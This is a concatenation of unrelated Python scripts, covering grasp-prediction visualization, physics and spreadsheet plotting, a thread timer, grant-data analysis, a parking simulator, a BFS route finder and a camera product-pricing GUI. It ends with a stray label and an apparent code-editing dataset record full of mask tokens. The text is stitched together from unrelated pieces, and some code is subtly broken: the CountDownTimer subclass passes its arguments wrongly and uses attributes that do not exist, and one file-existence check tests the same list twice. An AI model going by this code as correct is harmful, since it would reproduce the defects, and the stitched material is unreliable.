""" Visualize the predictions of a GQCNN on a dataset Visualizes TP, TN, FP, FN.. Author: Vishal Satish """ import copy import logging import numpy as np import os import sys from random import shuffle import autolab_core.utils as utils from autolab_core import YamlConfig, Point from perception import BinaryImage, ColorImage, DepthImage, GdImage, GrayscaleImage, RgbdImage, RenderMode from gqcnn import Grasp2D, GQCNN, ClassificationResult, InputDataMode, ImageMode, ImageFileTemplates from gqcnn import Visualizer as vis2d import IPython class GQCNNPredictionVisualizer(object): """ Class to visualize predictions of GQCNN on a specified dataset. Visualizes TP, TN, FP, FN. """ def __init__(self, config): """ Parameters ---------- config : dict dictionary of configuration parameters """ # setup config self.cfg = config # setup for visualization self._setup() def visualize(self): """ Visualize predictions """ logging.info('Visualizing ' + self.datapoint_type) # iterate through shuffled file indices for i in self.indices: im_filename = self.im_filenames[i] pose_filename = self.pose_filenames[i] label_filename = self.label_filenames[i] logging.info('Loading Image File: ' + im_filename + ' Pose File: ' + pose_filename + ' Label File: ' + label_filename) # load tensors from files metric_tensor = np.load(os.path.join(self.data_dir, label_filename))['arr_0'] label_tensor = 1 * (metric_tensor > self.metric_thresh) image_tensor = np.load(os.path.join(self.data_dir, im_filename))['arr_0'] hand_poses_tensor = np.load(os.path.join(self.data_dir, pose_filename))['arr_0'] pose_tensor = self._read_pose_data(hand_poses_tensor, self.input_data_mode) # score with neural network pred_p_success_tensor = self._gqcnn.predict(image_tensor, pose_tensor) # compute results classification_result = ClassificationResult([pred_p_success_tensor], [label_tensor]) logging.info('Error rate on files: %.3f' %(classification_result.error_rate)) logging.info('Precision on files: %.3f' %(classification_result.precision)) logging.info('Recall on files: %.3f' %(classification_result.recall)) mispred_ind = classification_result.mispredicted_indices() correct_ind = classification_result.correct_indices() # IPython.embed() if self.datapoint_type == 'true_positive' or self.datapoint_type == 'true_negative': vis_ind = correct_ind else: vis_ind = mispred_ind num_visualized = 0 # visualize for ind in vis_ind: # limit the number of sampled datapoints displayed per object if num_visualized >= self.samples_per_object: break num_visualized += 1 # don't visualize the datapoints that we don't want if self.datapoint_type == 'true_positive': if classification_result.labels[ind] == 0: continue elif self.datapoint_type == 'true_negative': if classification_result.labels[ind] == 1: continue elif self.datapoint_type == 'false_positive': if classification_result.labels[ind] == 0: continue elif self.datapoint_type == 'false_negative': if classification_result.labels[ind] == 1: continue logging.info('Datapoint %d of files for %s' %(ind, im_filename)) logging.info('Depth: %.3f' %(hand_poses_tensor[ind, 2])) data = image_tensor[ind,...] 
if self.display_image_type == RenderMode.SEGMASK: image = BinaryImage(data) elif self.display_image_type == RenderMode.GRAYSCALE: image = GrayscaleImage(data) elif self.display_image_type == RenderMode.COLOR: image = ColorImage(data) elif self.display_image_type == RenderMode.DEPTH: image = DepthImage(data) elif self.display_image_type == RenderMode.RGBD: image = RgbdImage(data) elif self.display_image_type == RenderMode.GD: image = GdImage(data) vis2d.figure() if self.display_image_type == RenderMode.RGBD: vis2d.subplot(1,2,1) vis2d.imshow(image.color) grasp = Grasp2D(Point(image.center, 'img'), 0, hand_poses_tensor[ind, 2], self.gripper_width_m) grasp.camera_intr = grasp.camera_intr.resize(1.0 / 3.0) vis2d.grasp(grasp) vis2d.subplot(1,2,2) vis2d.imshow(image.depth) vis2d.grasp(grasp) elif self.display_image_type == RenderMode.GD: vis2d.subplot(1,2,1) vis2d.imshow(image.gray) grasp = Grasp2D(Point(image.center, 'img'), 0, hand_poses_tensor[ind, 2], self.gripper_width_m) grasp.camera_intr = grasp.camera_intr.resize(1.0 / 3.0) vis2d.grasp(grasp) vis2d.subplot(1,2,2) vis2d.imshow(image.depth) vis2d.grasp(grasp) else: vis2d.imshow(image) grasp = Grasp2D(Point(image.center, 'img'), 0, hand_poses_tensor[ind, 2], self.gripper_width_m) grasp.camera_intr = grasp.camera_intr.resize(1.0 / 3.0) vis2d.grasp(grasp) vis2d.title('Datapoint %d: Pred: %.3f Label: %.3f' %(ind, classification_result.pred_probs[ind,1], classification_result.labels[ind])) vis2d.show() # cleanup self._cleanup() def _cleanup(self): """ Close GQCNN TF session""" self._gqcnn.close_session() def _setup(self): """ Setup for visualization """ # setup logger logging.getLogger().setLevel(logging.INFO) logging.info('Setting up for visualization.') #### read config params ### # dataset directory self.data_dir = self.cfg['dataset_dir'] # visualization params self.display_image_type = self.cfg['display_image_type'] self.font_size = self.cfg['font_size'] self.samples_per_object = self.cfg['samples_per_object'] # analysis params self.datapoint_type = self.cfg['datapoint_type'] self.image_mode = self.cfg['image_mode'] self.input_data_mode = self.cfg['data_format'] self.target_metric_name = self.cfg['metric_name'] self.metric_thresh = self.cfg['metric_thresh'] self.gripper_width_m = self.cfg['gripper_width_m'] # setup data filenames self._setup_data_filenames() # setup shuffled file indices self._compute_indices() # load gqcnn logging.info('Loading GQ-CNN') self.model_dir = self.cfg['model_dir'] self._gqcnn = GQCNN.load(self.model_dir) self._gqcnn.open_session() def _setup_data_filenames(self): """ Setup image and pose data filenames, subsample files, check validity of filenames/image mode """ # read in filenames of training data(poses, images, labels) logging.info('Reading filenames') all_filenames = os.listdir(self.data_dir) if self.image_mode== ImageMode.BINARY: self.im_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.binary_im_tensor_template) > -1] elif self.image_mode== ImageMode.DEPTH: self.im_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.depth_im_tensor_template) > -1] elif self.image_mode== ImageMode.BINARY_TF: self.im_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.binary_im_tf_tensor_template) > -1] elif self.image_mode== ImageMode.COLOR_TF: self.im_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.color_im_tf_tensor_template) > -1] elif self.image_mode== ImageMode.GRAY_TF: self.im_filenames = [f for f in all_filenames if 
f.find(ImageFileTemplates.gray_im_tf_tensor_template) > -1] elif self.image_mode== ImageMode.DEPTH_TF: self.im_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.depth_im_tf_tensor_template) > -1] elif self.image_mode== ImageMode.DEPTH_TF_TABLE: self.im_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.depth_im_tf_table_tensor_template) > -1] else: raise ValueError('Image mode %s not supported.' %(self.image_mode)) self.pose_filenames = [f for f in all_filenames if f.find(ImageFileTemplates.hand_poses_template) > -1] self.label_filenames = [f for f in all_filenames if f.find(self.target_metric_name) > -1] self.im_filenames.sort(key = lambda x: int(x[-9:-4])) self.pose_filenames.sort(key = lambda x: int(x[-9:-4])) self.label_filenames.sort(key = lambda x: int(x[-9:-4])) # check that all file categories were found if len(self.im_filenames) == 0 or len(self.label_filenames) == 0 or len(self.label_filenames) == 0: raise ValueError('1 or more required training files could not be found') def _compute_indices(self): """ Generate random file index so visualization starts from a different random file everytime """ self.indices = np.arange(len(self.im_filenames)) np.random.shuffle(self.indices) def _read_pose_data(self, pose_arr, input_data_mode): """ Read the pose data and slice it according to the specified input_data_mode Parameters ---------- pose_arr: :obj:`ndArray` full pose data array read in from file input_data_mode: :obj:`InputDataMode` enum for input data mode, see optimizer_constants.py for all possible input data modes Returns ------- :obj:`ndArray` sliced pose_data corresponding to input data mode """ if input_data_mode == InputDataMode.TF_IMAGE: return pose_arr[:,2:3] elif input_data_mode == InputDataMode.TF_IMAGE_PERSPECTIVE: return np.c_[pose_arr[:,2:3], pose_arr[:,4:6]] elif input_data_mode == InputDataMode.RAW_IMAGE: return pose_arr[:,:4] elif input_data_mode == InputDataMode.RAW_IMAGE_PERSPECTIVE: return pose_arr[:,:6] elif input_data_mode == InputDataMode.REGRASPING: # depth, approach angle, and delta angle for reorientation return np.c_[pose_arr[:,2:3], pose_arr[:,4:5], pose_arr[:,6:7]] else: raise ValueError('Input data mode %s not supported' %(input_data_mode))
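# --- Hypothetical usage sketch, not part of the original file ---
# The YAML path and its keys are assumptions inferred from what _setup()
# reads above (dataset_dir, model_dir, display_image_type, ...); they are
# not a confirmed config shipped with the project.
if __name__ == '__main__':
    config = YamlConfig('cfg/visualize_gqcnn_predictions.yaml')  # assumed path
    visualizer = GQCNNPredictionVisualizer(config)
    visualizer.visualize()  # opens a TF session in _setup() and closes it on completion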
import numpy as np
from scipy import stats
from statarray import statdat

import matplotlib.pyplot as plt
import matplotlib
from matplotlib import rc
rc('font', **{'family': 'serif'})

# Data file
datfile = 'data001/a2a1_detuning_allelastic.dat'

# Values of nafm for which plots will be shown
nafms = [4, 6, 8, 10, 12, 16, 20, 24, 32, 34, 38, 40]

cols = 2
rows = len(nafms) / 2 + len(nafms) % 2  # Python 2 integer division

figure = plt.figure(figsize=(10.8, 3.6 * rows))
gs = matplotlib.gridspec.GridSpec(rows, cols, wspace=0.6, hspace=0.42)

import fetchdata
from uncertainties import unumpy

for i, nafm in enumerate(nafms):
    detuning = 6.44
    a1, a2 = fetchdata.fetch_data_A1A2({'afmsize': nafm, 'ai': 0.}, 'det', datfile)

    # Put the units in the cross section
    sunits = 9 * (671e-7 ** 2) / 16 / (np.pi ** 2)
    a1[:, 1] = sunits * a1[:, 1]
    a1[:, 2] = sunits * a1[:, 2]
    a2[:, 1] = sunits * a2[:, 1]
    a2[:, 2] = sunits * a2[:, 2]

    ax = plt.subplot(gs[i % rows, i / rows])
    ax.set_title('AFM = %d sites' % nafm)

    # Propagate the error bars through the ratio A2/A1
    a1s = unumpy.uarray(a1[:, 1], a1[:, 2])
    a2s = unumpy.uarray(a2[:, 1], a2[:, 2])
    a2a1 = a2s / a1s
    a2a1_mean = unumpy.nominal_values(a2a1)
    a2a1_std = unumpy.std_devs(a2a1)

    ax.errorbar(a2[:, 0], a2a1_mean, yerr=a2a1_std,
                capsize=0., elinewidth=1.,
                fmt='.', ecolor='blue', mec='blue',
                mew=1., ms=5.,
                marker='o', mfc='lightblue',
                label="A2/A1")
    ax.set_ylabel('A2/A1')
    ax.grid()
    ax.set_xlabel('Detuning from state 2 ($\Gamma$)')

    if nafm == 40:
        ax.set_xlim(-10, 10)

figure.savefig('a2a1_detuning.png', dpi=140)
# -*- coding: utf-8 -*-

import sys
import xlrd
import numpy as np
import matplotlib.pyplot as plt

if __name__ == "__main__":
    param = sys.argv
    print "Hello:" + param[0]

    # Open the workbook
    book = xlrd.open_workbook('sample.xls')

    # Select the sheet by name (or by index with book.sheet_by_index(0))
    sheet = book.sheet_by_name(u"Sheet1")

    plot_x = np.zeros(sheet.nrows - 1, dtype=np.float64)
    plot_y = np.zeros(sheet.nrows - 1, dtype=np.float64)

    for row in range(sheet.nrows):
        if row == 0:
            # The first row holds the column headers, used as axis labels
            plt.xlabel(sheet.cell(0, 1).value)
            plt.ylabel(sheet.cell(0, 2).value)
        elif row >= 1:
            plot_x[row - 1] = float(sheet.cell(row, 1).value)
            plot_y[row - 1] = float(sheet.cell(row, 2).value)

    plt.xlim([0, 100])
    plt.ylim([0, 50])
    plt.plot(plot_x, plot_y, 'o', color='r', label='test1')
    plt.title(u'排出量')  # "Emissions"
    plt.legend(loc='lower right')  # show the legend
    plt.show()
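# Expected layout of sample.xls, inferred from the loop above (column 0 is
# never read; columns 1 and 2 carry the headers in row 0 and the (x, y) data
# below them). A made-up illustrative sheet:
#
#     ID | time [s] | emissions
#     1  | 10       | 5
#     2  | 20       | 12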
#!/usr/bin/env python
#coding=UTF8
'''
    @author: devin
    @time: 2013-11-23
    @desc: timer
'''
import threading
import time

class Timer(threading.Thread):
    '''
    Run a task repeatedly, once every fixed interval.
    '''
    def __init__(self, seconds, fun, **kwargs):
        '''
        seconds is the interval between runs, in seconds
        fun is the task to execute on each tick
        kwargs are the keyword arguments passed to fun
        '''
        self.sleep_time = seconds
        threading.Thread.__init__(self)
        self.fun = fun
        self.kwargs = kwargs
        self.is_stop = threading.Event()

    def run(self):
        while not self.is_stop.is_set():
            self.fun(**self.kwargs)
            self.is_stop.wait(timeout=self.sleep_time)

    def stop(self, *args):
        self.is_stop.set()

class CountDownTimer(Timer):
    '''
    Run the task a fixed total number of times.
    '''
    def __init__(self, seconds, total_times, fun, **kwargs):
        '''
        total_times is the total number of times to run the task;
        the other parameters are the same as Timer's
        '''
        self.total_times = total_times
        # the original passed the kwargs dict positionally, which raises a
        # TypeError against Timer's (seconds, fun, **kwargs) signature
        Timer.__init__(self, seconds, fun, **kwargs)

    def run(self):
        # the original run() referenced self.is_run and self.args, neither of
        # which exists; it is rewritten here against Timer's actual attributes
        counter = 0
        while counter < self.total_times and not self.is_stop.is_set():
            self.is_stop.wait(timeout=self.sleep_time)
            self.fun(**self.kwargs)
            counter += 1

if __name__ == "__main__":
    def test(s):
        print s
    timer = Timer(2, test, s="a")
    timer.start()
    import signal
    signal.signal(signal.SIGINT, timer.stop)
    signal.signal(signal.SIGTERM, timer.stop)
    signal.pause()
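# Hypothetical CountDownTimer usage (a sketch of mine, not part of the
# original demo): run a task five times, one second apart; the thread then
# exits on its own without needing stop().
def _demo_countdown():
    def tick(s):
        print s
    cdt = CountDownTimer(1, 5, tick, s="tick")
    cdt.start()
    cdt.join()  # returns after five runs, or earlier if stop() is called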
import numpy as np
import matplotlib.pyplot as plt
import csv

category = ["Ecological Well-being", "Health & Human Services", "Arts & Culture", "Community Building", "Environment"]
arr = np.empty((0, 6), str)
moneyGranted = [[0] * 5 for _ in range(6)]
moneyRequested = [[0] * 5 for _ in range(6)]
perFull = [[0] * 5 for _ in range(6)]


def task5(arr):
    # Accumulate granted/requested totals per year (2015-2020) and category
    for row in arr:
        moneyGranted[int(row[1]) - 2015][int(row[3]) - 1] += int(row[4])
        moneyRequested[int(row[1]) - 2015][int(row[3]) - 1] += int(row[5])

    # Percentage of the requested money that was actually granted
    for i in range(6):
        for j in range(5):
            if moneyRequested[i][j] == 0:
                print(i + 2015, ",", category[j], ":", "0.0%")
            else:
                perFull[i][j] = round((moneyGranted[i][j] / moneyRequested[i][j]) * 100, 2)
                print(i + 2015, ",", category[j], ":", perFull[i][j], "%")

    # One bar chart per year
    for i in range(6):
        graphTitle = "Percentage fulfilled for each category in " + str(i + 2015)
        plt.title(graphTitle)
        plt.bar(category, perFull[i])
        plt.show()


with open('CEL_HistoricalGrantInformation_2014-7Oct2020_CSV.csv', newline='') as csvfile:  # read the csv file
    reader = csv.DictReader(csvfile)
    for row in reader:
        arr = np.append(arr, np.array([[row['organization_id'], int(row['year_id']), row['process_id'],
                                        int(row['area_id']), int(row['awarded_id']), int(row['requested_id'])]]), axis=0)

task5(arr)
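# The CSV is assumed (from the DictReader keys above) to carry at least these
# columns, with year_id in 2015-2020 and area_id in 1-5. A made-up
# illustrative row:
#
#     organization_id,year_id,process_id,area_id,awarded_id,requested_id
#     ORG-001,2017,P1,3,1500,2000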
class BaseService:
    def __init__(self, context):
        self._context = context

    def post(self, path, body):
        result = self._context.http.post(path, body)
        return result.json()["Data"]
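# Hedged illustration of how BaseService is meant to be extended -- the
# service name and endpoint path are my assumptions; the class above only
# implies a context exposing an `http` client whose post(path, body) returns
# a requests-style response.
class OrderService(BaseService):
    def create_order(self, order):
        # POST the order and return the "Data" field of the JSON response
        return self.post("/orders", order)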
from datetime import datetime

class Guest:
    def __init__(self, Name, FamilyName, Car, controlboard,
                 CarRotationManager, ID=0, linkedplatform=None, Start=0):
        # --- Initializing guest credentials/info ---
        self.Name = Name
        self.FamilyName = FamilyName
        self.Car = Car
        self.controlboard = controlboard
        self.CarRotationManager = CarRotationManager
        if ID == 0:
            # New guest: ask the control board (decision engine) to generate a unique ID
            self.uniqueID = controlboard.set_id()
        else:
            # Returning guest: reuse the ID he was given the first time he parked
            self.uniqueID = ID
        self.parked = False          # whether the guest's car is currently parked
        self.linkedplatform = None   # the platform where the guest's car is parked
        self.Start = Start           # the time when the guest parked

    def parked_and_linkedplatform_value(self):
        # Checks if the guest is parked and sets parked/linkedplatform accordingly
        (boolean, linkedplatform) = self.CarRotationManager.check_if_guest_parked(self)
        if boolean == True:
            self.parked = True
            self.linkedplatform = linkedplatform
        else:
            self.parked = False
            self.linkedplatform = None

    def request_car(self):
        # Releases the car if it is parked
        self.parked_and_linkedplatform_value()
        if self.parked == False:
            print("Your car is not parked!\n")
            return
        pos = self.CarRotationManager.get_platform_position(self)  # current position in the parking
        if pos == -1:
            print("Your car is not parked!\n")
            return
        self.CarRotationManager.return_platform_to_base(pos)       # move the car to the base position
        self.CarRotationManager.release_car(self.linkedplatform)   # release the car
        self.parked = False
        self.CarRotationManager.occupiedPlatforms = self.CarRotationManager.occupiedPlatforms - 1
        print("Your " + self.Car.model + " has been released.")
        print("Have a great day " + self.Name + "!\n")
        # Remove the guest from the file once his car is no longer parked
        self.controlboard.remove_guest_from_file(self)

    def park_car(self):
        # Parks the guest's car if it is not already parked
        self.parked_and_linkedplatform_value()
        if self.parked == True:
            print("Your car is already parked!\n")
            return
        platform = self.CarRotationManager.return_empty_platform()  # closest empty platform
        if platform == None:
            return -1  # parking is full
        self.CarRotationManager.return_platform_to_base(platform.Position)
        platform.link(self)  # the guest's car is now parked on the base platform
        self.linkedplatform = platform
        self.parked = True
        self.CarRotationManager.occupiedPlatforms = self.CarRotationManager.occupiedPlatforms + 1
        print("Your " + self.Car.model + " has been parked!\n")
        now = datetime.now()  # current time, i.e. when the guest parks his car
        array = str(now).split()
        string_into_file = array[0] + "@" + array[1]
        # Record the parking time next to the guest's information in the guest file
        self.controlboard.add_guest_to_file(self, string_into_file)
        self.Start = string_into_file
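# Hypothetical wiring (a sketch): Car, the control board, and the
# CarRotationManager are defined elsewhere in this project, so they are taken
# here as parameters; the function only illustrates the intended call order.
def demo_parking_session(car, control_board, rotation_manager):
    guest = Guest("Ada", "Lovelace", car, control_board, rotation_manager)
    guest.park_car()     # rotates a free platform to base, links the car, logs the time
    guest.request_car()  # rotates the platform back to base and releases the car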
from collections import deque

def safeInsert(graph, left, right):
    # Add an undirected edge, creating adjacency dicts on first use
    if left not in graph:
        graph[left] = {}
    graph[left][right] = True
    if right not in graph:
        graph[right] = {}
    graph[right][left] = True

def trace(graph, start, end):
    # Breadth-first search from start, recording each node's predecessor
    queue = deque([start])
    pred = {start: None}
    while len(queue) > 0:
        cur = queue.popleft()
        if cur in graph:
            for neigh in graph[cur]:
                if neigh not in pred:
                    pred[neigh] = cur
                    queue.append(neigh)
    if end not in pred:
        return "no route found"
    else:
        # Walk the predecessor chain back from end, then reverse it
        stack = [end]
        while pred[stack[-1]] != None:
            stack.append(pred[stack[-1]])
        stack = stack[::-1]
        return " ".join(stack)

graph = {}

n = int(raw_input())

for i in xrange(n):
    line = raw_input().split()
    for neigh in line[1:]:
        safeInsert(graph, line[0], neigh)

start, end = raw_input().split()

print trace(graph, start, end)
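# A tiny, made-up input illustrating the expected stdin format: the first
# line gives the number of adjacency lines, each adjacency line is a node
# followed by its neighbours, and the last line is the start/end pair.
#
#     3
#     a b c
#     b d
#     d e
#     a e
#
# With edges a-b, a-c, b-d, and d-e, the BFS above prints: a b d e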
# Main thread for starting the GUI
import cv2
import PIL
from PIL import Image, ImageTk
from tkinter import *
from matplotlib import pyplot as pt
from matplotlib.image import imread
from control.control import Control

control = Control()

# Gives the instruction for saving the current frame
def takePicture():
    global setImage
    setImage = True

# Adds rectangles to the image where the AI found products
# **ARGS: list with the rectangles (matplotlib patches)
def addRectangles(locations):
    _, axe = pt.subplots()
    img = imread("hola.jpg")
    cv2image = cv2.cvtColor(img, cv2.COLOR_BGR2RGBA)
    axe.imshow(cv2image)
    alto, ancho, _ = img.shape
    for item in locations:
        axe.add_patch(item)
    pt.savefig('result.png')

# Window metrics
width, height = 800, 700

# We use OpenCV to capture the frames
cap = cv2.VideoCapture(0)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)

# UI elements
root = Tk()
root.bind('<Escape>', lambda e: root.quit())
lmain = Label(root)
lmain.pack()
lProccessedData = Label(root)
lProccessedData.pack()
B = Button(text="Start", command=takePicture)
B.pack()
textEditor = Text(root, width=43, height=5)
textEditor.pack()
textEditor.place(x=400, y=400)

# Initial widget state
setImage = False
selectedImage = None
root.geometry("900x600")
root.resizable(False, False)

# Sets the total price
# **ARGS: list with all the products found
def set_count(products):
    div = {"Harina de Trigo La Nieve": 1700, "Papitas margarita": 1000, "Lentejas": 1800,
           "Shampoo": 13900, "Tarrito rojo": 13000, "Polvo de bizcocho": 2000}
    div_temp = []
    a = ""
    b = 0
    print(products)
    for item in products:
        if item in div_temp:
            continue
        div_temp.append(item)
        c = products.count(item) * div[item]  # line total: count * unit price
        b = b + c
        print(item)
        a = a + item + " " + str(products.count(item)) + " " + str(c) + " \n"
    textEditor.insert('1.0', "")
    a = a + " \n\n\n Total:" + str(b) + "\n\n"
    textEditor.insert('1.0', a)

# Shows the frame captured by the camera
def show_frame():
    global setImage
    global selectedImage
    _, frame = cap.read()
    frame = cv2.flip(frame, 1)
    cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)
    img = PIL.Image.fromarray(cv2image)
    img = img.resize((400, 300))
    imgtk = ImageTk.PhotoImage(image=img)
    lmain.imgtk = imgtk
    lmain.configure(image=imgtk)
    if setImage:
        selectedImage = frame
        setImage = False
        cv2.imwrite('hola.jpg', selectedImage)
        res = control.get_results('hola.jpg')
        addRectangles(res[0])
        set_count(res[1])
        selectedImage = cv2.imread('result.png')
        selectedImage = PIL.Image.fromarray(selectedImage)
        selectedImage = selectedImage.resize((400, 300))
        imgtk = ImageTk.PhotoImage(image=selectedImage)
        selectedImage = imgtk
        B["state"] = NORMAL
    lmain.after(10, show_frame)
    lmain.place(x=10, y=40)
    B.place(x=10, y=500)
    lProccessedData.place(x=470, y=40)
    lProccessedData.configure(image=selectedImage)

# Start UI
show_frame()
root.mainloop()
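# Inferred contract of control.get_results (read off its two call sites
# above, not a documented API): it returns a pair where res[0] is a list of
# matplotlib patches marking the detected products and res[1] is a list of
# product-name strings that set_count prices against the div dictionary.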
normal
{ "blob_id": "8d8c211895fd43b1e2a38216693b0c00f6f76756", "index": 5748, "step-1": "<mask token>\n\n\ndef takePicture():\n global setImage\n setImage = True\n\n\ndef addRectangles(locations):\n _, axe = pt.subplots()\n img = imread('hola.jpg')\n cv2image = cv2.cvtColor(img, cv2.COLOR_BGR2RGBA)\n axe.imshow(cv2image)\n alto, ancho, _ = img.shape\n for item in locations:\n axe.add_patch(item)\n pt.savefig('result.png')\n\n\n<mask token>\n\n\ndef set_count(products):\n div = {'Harina de Trigo La Nieve': 1700, 'Papitas margarita': 1000,\n 'Lentejas': 1800, 'Shampoo': 13900, 'Tarrito rojo': 13000,\n 'Polvo de bizcocho': 2000}\n div_temp = []\n a = ''\n b = 0\n print(products)\n for item in products:\n if item in div_temp:\n continue\n div_temp.append(item)\n c = products.count(item) * div[item]\n b = b + c\n print(item)\n a = a + item + ' ' + str(products.count(item)) + ' ' + str(c\n ) + ' \\n'\n textEditor.insert('1.0', '')\n a = a + ' \\n\\n\\n Toral:' + str(b) + '\\n\\n'\n textEditor.insert('1.0', a)\n\n\ndef show_frame():\n global setImage\n global selectedImage\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n orig = cv2image\n img = PIL.Image.fromarray(cv2image)\n img = img.resize((400, 300))\n imgtk = ImageTk.PhotoImage(image=img)\n lmain.imgtk = imgtk\n lmain.configure(image=imgtk)\n if setImage:\n selectedImage = frame\n setImage = False\n cv2.imwrite('hola.jpg', selectedImage)\n res = control.get_results('hola.jpg')\n addRectangles(res[0])\n set_count(res[1])\n selectedImage = cv2.imread('result.png')\n selectedImage = PIL.Image.fromarray(selectedImage)\n selectedImage = selectedImage.resize((400, 300))\n imgtk = ImageTk.PhotoImage(image=selectedImage)\n selectedImage = imgtk\n B['state'] = NORMAL\n lmain.after(10, show_frame)\n lmain.place(x=10, y=40)\n B.place(x=10, y=500)\n lProccessedData.place(x=470, y=40)\n lProccessedData.configure(image=selectedImage)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef takePicture():\n global setImage\n setImage = True\n\n\ndef addRectangles(locations):\n _, axe = pt.subplots()\n img = imread('hola.jpg')\n cv2image = cv2.cvtColor(img, cv2.COLOR_BGR2RGBA)\n axe.imshow(cv2image)\n alto, ancho, _ = img.shape\n for item in locations:\n axe.add_patch(item)\n pt.savefig('result.png')\n\n\n<mask token>\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, width)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)\n<mask token>\nroot.bind('<Escape>', lambda e: root.quit())\n<mask token>\nlmain.pack()\n<mask token>\nlProccessedData.pack()\n<mask token>\nB.pack()\n<mask token>\ntextEditor.pack()\ntextEditor.place(x=400, y=400)\n<mask token>\nroot.geometry('900x600')\nroot.resizable(False, False)\n\n\ndef set_count(products):\n div = {'Harina de Trigo La Nieve': 1700, 'Papitas margarita': 1000,\n 'Lentejas': 1800, 'Shampoo': 13900, 'Tarrito rojo': 13000,\n 'Polvo de bizcocho': 2000}\n div_temp = []\n a = ''\n b = 0\n print(products)\n for item in products:\n if item in div_temp:\n continue\n div_temp.append(item)\n c = products.count(item) * div[item]\n b = b + c\n print(item)\n a = a + item + ' ' + str(products.count(item)) + ' ' + str(c\n ) + ' \\n'\n textEditor.insert('1.0', '')\n a = a + ' \\n\\n\\n Toral:' + str(b) + '\\n\\n'\n textEditor.insert('1.0', a)\n\n\ndef show_frame():\n global setImage\n global selectedImage\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n orig = cv2image\n img = PIL.Image.fromarray(cv2image)\n img = img.resize((400, 300))\n imgtk = 
ImageTk.PhotoImage(image=img)\n lmain.imgtk = imgtk\n lmain.configure(image=imgtk)\n if setImage:\n selectedImage = frame\n setImage = False\n cv2.imwrite('hola.jpg', selectedImage)\n res = control.get_results('hola.jpg')\n addRectangles(res[0])\n set_count(res[1])\n selectedImage = cv2.imread('result.png')\n selectedImage = PIL.Image.fromarray(selectedImage)\n selectedImage = selectedImage.resize((400, 300))\n imgtk = ImageTk.PhotoImage(image=selectedImage)\n selectedImage = imgtk\n B['state'] = NORMAL\n lmain.after(10, show_frame)\n lmain.place(x=10, y=40)\n B.place(x=10, y=500)\n lProccessedData.place(x=470, y=40)\n lProccessedData.configure(image=selectedImage)\n\n\nshow_frame()\nroot.mainloop()\n", "step-3": "<mask token>\ncontrol = Control()\n\n\ndef takePicture():\n global setImage\n setImage = True\n\n\ndef addRectangles(locations):\n _, axe = pt.subplots()\n img = imread('hola.jpg')\n cv2image = cv2.cvtColor(img, cv2.COLOR_BGR2RGBA)\n axe.imshow(cv2image)\n alto, ancho, _ = img.shape\n for item in locations:\n axe.add_patch(item)\n pt.savefig('result.png')\n\n\nwidth, height = 800, 700\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, width)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)\nroot = Tk()\nroot.bind('<Escape>', lambda e: root.quit())\nlmain = Label(root)\nlmain.pack()\nlProccessedData = Label(root)\nlProccessedData.pack()\nB = Button(text='Start', command=takePicture)\nB.pack()\ntextEditor = Text(root, width=43, height=5)\ntextEditor.pack()\ntextEditor.place(x=400, y=400)\nsetImage = False\nselectedImage = None\nroot.geometry('900x600')\nroot.resizable(False, False)\n\n\ndef set_count(products):\n div = {'Harina de Trigo La Nieve': 1700, 'Papitas margarita': 1000,\n 'Lentejas': 1800, 'Shampoo': 13900, 'Tarrito rojo': 13000,\n 'Polvo de bizcocho': 2000}\n div_temp = []\n a = ''\n b = 0\n print(products)\n for item in products:\n if item in div_temp:\n continue\n div_temp.append(item)\n c = products.count(item) * div[item]\n b = b + c\n print(item)\n a = a + item + ' ' + str(products.count(item)) + ' ' + str(c\n ) + ' \\n'\n textEditor.insert('1.0', '')\n a = a + ' \\n\\n\\n Toral:' + str(b) + '\\n\\n'\n textEditor.insert('1.0', a)\n\n\ndef show_frame():\n global setImage\n global selectedImage\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n orig = cv2image\n img = PIL.Image.fromarray(cv2image)\n img = img.resize((400, 300))\n imgtk = ImageTk.PhotoImage(image=img)\n lmain.imgtk = imgtk\n lmain.configure(image=imgtk)\n if setImage:\n selectedImage = frame\n setImage = False\n cv2.imwrite('hola.jpg', selectedImage)\n res = control.get_results('hola.jpg')\n addRectangles(res[0])\n set_count(res[1])\n selectedImage = cv2.imread('result.png')\n selectedImage = PIL.Image.fromarray(selectedImage)\n selectedImage = selectedImage.resize((400, 300))\n imgtk = ImageTk.PhotoImage(image=selectedImage)\n selectedImage = imgtk\n B['state'] = NORMAL\n lmain.after(10, show_frame)\n lmain.place(x=10, y=40)\n B.place(x=10, y=500)\n lProccessedData.place(x=470, y=40)\n lProccessedData.configure(image=selectedImage)\n\n\nshow_frame()\nroot.mainloop()\n", "step-4": "import cv2\nimport PIL\nfrom PIL import Image, ImageTk\nfrom tkinter import *\nfrom matplotlib import pyplot as pt\nfrom matplotlib.image import imread\nfrom control.control import Control\ncontrol = Control()\n\n\ndef takePicture():\n global setImage\n setImage = True\n\n\ndef addRectangles(locations):\n _, axe = pt.subplots()\n img = imread('hola.jpg')\n 
